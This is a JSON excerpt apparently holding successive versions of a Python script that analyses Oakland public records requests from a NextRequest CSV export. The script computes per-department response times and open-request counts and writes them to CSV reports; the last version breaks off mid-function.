"step-3": "<mask token>\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\n<mask token>\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\ndef rptDeptFreq(prrTbl, deptTbl, startDate, outf):\n outs = open(outf, 'w')\n outs.write('Dept,Freq\\n')\n for dept in sorted(deptTbl.keys()):\n nrecent = 0\n for prrIdx in deptTbl[dept]:\n prr = prrTbl[prrIdx]\n if prr['createDate'] >= startDate:\n nrecent += 1\n outs.write('%s,%d\\n' % (dept, nrecent))\n outs.close()\n\n\ndef rptOpenPRR(prrTbl, outf):\n daysOpen = defaultdict(lambda : defaultdict(list))\n runDate = datetime.datetime.today()\n for prrID in prrTbl.keys():\n prr = prrTbl[prrID]\n opdP = 'Police Department' in prr['dept']\n if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[\n 'status'] == 'Due soon':\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n openYears = openDays // 365\n if openYears == 0:\n dkey = openDays\n else:\n dkey = 1000 + openYears\n daysOpen[opdP][dkey].append(prrID)\n outs = open(outf, 'w')\n outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\\n')\n allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))\n allNDay = sorted(list(allNDaySet))\n for nday in allNDay:\n if nday > 365:\n lbl = '> %d year' % (nday - 1000)\n else:\n lbl = '%d' % nday\n opdList = daysOpen[1][nday] if nday in daysOpen[1] else []\n nonList = daysOpen[0][nday] if nday in daysOpen[0] else []\n outs.write('%s,%d,%d,\"%s\",\"%s\"\\n' % (lbl, len(opdList), len(nonList\n ), opdList, nonList))\n outs.close()\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\nif __name__ == '__main__':\n dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'\n startDate = datetime.datetime(2017, 1, 1)\n csvFile = dataDir + 'requests-2020-07-01-sdoran.csv'\n prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate)\n openPRRFile = dataDir + 'openPRR_200831.csv'\n rptOpenPRR(prr20Recent, openPRRFile)\n deptFreqFile = dataDir + 'deptFreq2.csv'\n rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile)\n createDateFile = dataDir + 'createDate_200831.csv'\n anlyzCreateDates(prr20Recent, createDateFile)\n clearDateDir = dataDir + 'deptClear_200831/'\n anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir)\n openOPDFile = dataDir + 'openOPD_200831.csv'\n rptOpenPRR(prr20Recent, openOPDFile)\n",
"step-4": "<mask token>\nPRRDateFmt = '%Y-%m-%dT%H:%M:%S'\nPRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'\nDateTypes = {'date_received': 'recdDate', 'date_created': 'createDate',\n 'status_updated': 'statusUpDate'}\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\nAllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date',\n 'Point of Contact', 'Request Date', 'Status', 'URL', 'Visibility',\n 'Closed Date', 'Closure Reasons', 'Departments', 'Format Received',\n 'Staff Time (hrs:minutes)', 'Staff Time (minutes)', 'Tags',\n 'Embargo Ends On Date', 'Staff Cost', 'Date First Contact',\n 'First Contact Event', 'Compliance', 'Anticipated Fulfillment Date',\n 'Expiration Date', 'Requester City', 'Requester State',\n 'Requester Zipcode', 'Requester Company']\nDeptNorm = {'Admin: Planning, Building & Neighborhood Preserv':\n 'Admin: Building Inspection', 'Budget and Fiscal':\n 'Budget and Revenue - Revenue Division',\n 'City Attorney Administration Unit': 'City Attorney',\n 'City Auditor Unit': 'City Auditor', 'City Clerk Unit': 'City Clerk',\n 'Oakland Police Department': 'Police Department',\n 'Contracts and Compliance': 'Contracts Compliance',\n 'Transportation Services - Administration':\n 'Department of Transportation', 'Fire': 'Fire Department',\n 'Human Resources Management': 'Human Resources',\n 'Information Technology (IT)': 'Information Technology',\n 'Public Works Agency': 'Public Works'}\nCSVDTFormat = '%m/%d/%Y %H:%M:%S %p'\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\ndef rptDeptFreq(prrTbl, deptTbl, startDate, outf):\n outs = open(outf, 'w')\n outs.write('Dept,Freq\\n')\n for dept in sorted(deptTbl.keys()):\n nrecent = 0\n for prrIdx in deptTbl[dept]:\n prr = prrTbl[prrIdx]\n if prr['createDate'] >= startDate:\n nrecent += 1\n outs.write('%s,%d\\n' % (dept, nrecent))\n outs.close()\n\n\ndef rptOpenPRR(prrTbl, outf):\n daysOpen = defaultdict(lambda : defaultdict(list))\n runDate = datetime.datetime.today()\n for prrID in prrTbl.keys():\n prr = prrTbl[prrID]\n opdP = 'Police Department' in prr['dept']\n if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[\n 'status'] == 'Due soon':\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n openYears = openDays // 365\n if openYears == 0:\n dkey = openDays\n else:\n dkey = 1000 + openYears\n daysOpen[opdP][dkey].append(prrID)\n outs = open(outf, 'w')\n outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\\n')\n allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))\n allNDay = sorted(list(allNDaySet))\n for nday in allNDay:\n if nday > 365:\n lbl = '> %d year' % (nday - 1000)\n else:\n lbl = '%d' % nday\n opdList = daysOpen[1][nday] if nday in daysOpen[1] else []\n nonList = daysOpen[0][nday] if nday in daysOpen[0] else []\n outs.write('%s,%d,%d,\"%s\",\"%s\"\\n' % (lbl, len(opdList), len(nonList\n ), opdList, nonList))\n outs.close()\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\nif __name__ == '__main__':\n dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'\n startDate = datetime.datetime(2017, 1, 1)\n csvFile = dataDir + 'requests-2020-07-01-sdoran.csv'\n prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate)\n openPRRFile = dataDir + 'openPRR_200831.csv'\n rptOpenPRR(prr20Recent, openPRRFile)\n deptFreqFile = dataDir + 'deptFreq2.csv'\n rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile)\n createDateFile = dataDir + 'createDate_200831.csv'\n anlyzCreateDates(prr20Recent, createDateFile)\n clearDateDir = dataDir + 'deptClear_200831/'\n anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir)\n openOPDFile = dataDir + 'openOPD_200831.csv'\n rptOpenPRR(prr20Recent, openOPDFile)\n",
"step-5": "'''harvestPRR: analyze Public Record Requests from CSV data provided by NextRequest\n\nCreated 27 Aug 20\n\n@author: [email protected]\n'''\n\nfrom collections import defaultdict\nimport csv\nimport datetime\nimport json\nimport random\nimport re\nimport requests\nimport sys\nimport time\nimport urllib\n\nimport re\n\n\nPRRDateFmt = '%Y-%m-%dT%H:%M:%S'\nPRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'\n\nDateTypes = {'date_received': 'recdDate',\n\t\t\t'date_created': 'createDate',\n\t\t\t'status_updated': 'statusUpDate'}\n\ndef freqHist3(tbl):\n\t'''python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t'''\n\t\n\tfrom functools import cmp_to_key\n\tdef cmpd1(a,b):\n\t\t\"decreasing order of frequencies\"\n\t\treturn b[1] - a[1]\n\n\t\n\tflist = list(tbl.items()) #python3\n\tflist.sort(key=cmp_to_key(cmpd1))\n\treturn flist\n\nAllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date',\n\t\t\t'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons',\n\t\t\t'Departments', 'Format Received', 'Staff Time (hrs:minutes)',\n\t\t\t'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date',\n\t\t\t'Staff Cost', 'Date First Contact', 'First Contact Event',\n\t\t\t'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date',\n\t\t\t'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company']\n\nDeptNorm = {\"Admin: Planning, Building & Neighborhood Preserv\": \"Admin: Building Inspection\",\n\t\t\t\"Budget and Fiscal\": \"Budget and Revenue - Revenue Division\",\n\t\t\t\"City Attorney Administration Unit\": \"City Attorney\",\n\t\t\t\"City Auditor Unit\": \"City Auditor\",\n\t\t\t\"City Clerk Unit\": \"City Clerk\",\n\t\t\t\"Oakland Police Department\": \"Police Department\",\n\t\t\t\"Contracts and Compliance\": \"Contracts Compliance\",\n\t\t\t\"Transportation Services - Administration\": \"Department of Transportation\",\n\t\t\t\"Fire\": \"Fire Department\",\n\t\t\t\"Human Resources Management\": \"Human Resources\",\n\t\t\t\"Information Technology (IT)\": \"Information Technology\",\n\t\t\t\"Public Works Agency\": \"Public Works\"}\n\nCSVDTFormat = '%m/%d/%Y %H:%M:%S %p'\n# 07/01/2020 09:54:53 AM\n\ndef bldIndexTblCSV(inf,startDate=None):\n\t'''return prrIDTbl, deptTbl\n\t'''\n\n\tprrTbl = {}\n\tdeptTbl = defaultdict(list) # keep list of all prrIDs\n\tstatusTbl = defaultdict(int)\n\tncloseDate = 0\n\tnolder = 0\n\tnmultDept = 0\n\tdeptSepChar = b'\\xef\\xbf\\xbd' # only used in Finance\n\t\n\treader = csv.DictReader(open(inf,encoding = \"utf8\",errors='replace'))\n\tfor i,entry in enumerate(reader):\n\t\tprr = {}\n\t\tprrID = entry['Id']\n\t\t\n\t\tcreateDateStr = entry['Created At'].strip()\n\t\tprr['createDate'] = datetime.datetime.strptime(createDateStr,CSVDTFormat) if createDateStr != '' else None\n\n\t\tif prr['createDate'] == None or \\\n\t\t\t(startDate != None and prr['createDate'] < startDate):\n\t\t\tnolder += 1\n\t\t\tcontinue\n\t\t\n\t\tdeptStr = entry['Departments'].strip()\n\t\t# NB: multiple department separated by semi-colon\n\t\tif deptStr.find(';') == -1:\n\t\t\tdeptList = [deptStr]\n\t\telse:\n\t\t\tnmultDept += 1\n\t\t\tdeptList = [dept.strip() for dept in deptStr.split(';')]\n\t\t\t\n\t\tdeptList2 = []\n\t\tfor dept in deptList:\n\t\t\tndept = DeptNorm[dept] if dept in DeptNorm else dept\n\t\t\tif ndept != '':\n\t\t\t\tdeptList2.append(ndept)\n\t\t\t\tdeptTbl[ndept].append(prrID)\n\t\tprr['dept'] = deptList2\n\t\t\t\n\t\tcloseDateStr = entry['Closed Date'].strip()\n\t\tprr['closeDate'] = datetime.datetime.strptime(closeDateStr,CSVDTFormat) if closeDateStr != '' else None\n\t\tprr['status'] = entry['Status'].strip()\n\t\tprr['text'] = entry['Request Text'].strip()\n\t\tprr['closeReason'] = entry['Closure Reasons'].strip()\n\t\tprr['URL'] = entry['URL'].strip()\n\t\t\n\t\t\n\t\tstatusTbl[ prr['status'] ] += 1\n\t\tif prr['closeDate'] != None:\n\t\t\tncloseDate += 1\n\t\t\t\n\t\tprrTbl[prrID] = prr\n\t\t\n\tprint('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % \\\n\t\t(len(prrTbl),len(deptTbl),nmultDept,ncloseDate))\n\tif startDate != None:\n\t\tprint('bldIndexTblCSV: NOld dropped=%d' % (nolder))\n\n# \tfreqList = freqHist3(deptTbl)\n# \tprint('Dept,Freq')\n# \tfor dept,freq in freqList:\n# \t\tprint('\"%s\",%d' % (dept,freq))\n\n\tfreqList = freqHist3(statusTbl)\n\tprint('Status,Freq')\n\tfor status,freq in freqList:\n\t\tprint('\"%s\",%d' % (status,freq))\n\t\n\t\n\treturn (prrTbl, deptTbl)\n\t\t\ndef compHistAvg(hist):\n\t'''compute first moment\n\tASSUME hist: value -> freq \n\t'''\n\tsum = n = 0\n\tfor v in hist.keys():\n\t\tn += hist[v]\n\t\tsum += v * hist[v]\n\t\t\n\treturn n,float(sum) / n\n\ndef compMedian(hist):\n\t'''compute MEDIAN value\n\tASSUME hist: value -> freq \n\t'''\n\n\t# only singletons thwart the search for half-way point\n\tif len(hist) == 1:\n\t\treturn hist[0]\n\t\n\tsum = n = 0\n\tvn = {}\n\tfor v in sorted(hist.keys()):\n\t\tn += hist[v]\n\t\tsum += v * hist[v]\n\t\tvn[v] = n\n\t\t\n\thalf = float(n/2.)\n\tfor v in sorted(hist.keys()):\n\t\tif vn[v] > half:\n\t\t\treturn v\t\n\ndef anlyzCreateDates(prrIDTbl,outf):\n\t'''distribution of create dates\n\t'''\n\t\n\tdateDist = defaultdict(int)\n\tnmissdate = 0\n\tfor prrID,prr in prrIDTbl.items():\n\t\t# 180204\n# \t\tfor dtype in DateTypes.values():\n# \t\t\tif dtype in prr:\n# \t\t\t\tif cdateFnd == None:\n# \t\t\t\t\tcdateFnd = prr[dtype]\n# \t\t\t\telse:\n# \t\t\t\t\tif prr[dtype] != cdateFnd:\n# \t\t\t\t\t\tcdateFnd = min([cdateFnd,prr[dtype]])\n\n\t\tcdateFnd = prr['createDate']\n\t\t\t\t\t\t\n\t\tif cdateFnd== None:\n\t\t\tnmissdate += 1\n\t\t\tcontinue\n\t\tmkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n\t\tdateDist[mkey] += 1\n\t\t\n\tprint('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl),nmissdate))\n\tallMon = list(dateDist.keys())\n\tallMon.sort()\n\touts = open(outf,'w')\n\touts.write('Month,Freq\\n')\n\tfor mkey in allMon:\n\t\touts.write('%s,%d\\n' % (mkey,dateDist[mkey]))\n\touts.close()\t\t\n\ndef normDeptName(dept):\n\treturn re.sub('\\W','_',dept.upper())\n\t\ndef anlyzClearDates(prrIDTbl,deptTbl,startDate,outdir,minDeptFreq=10):\n\t'''Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t'''\n\t\n\tallDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq ]\n\tallDept.sort()\n\n\tnonOPDresp = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq\n\tnonOPDopen = defaultdict(int) # month -> freq\n\t\n\tprint('\\n# Dept,NOld,NMissRecd,NMissClose')\n\tmissCloseDetails = defaultdict(lambda: defaultdict(list)) # dept -> recd 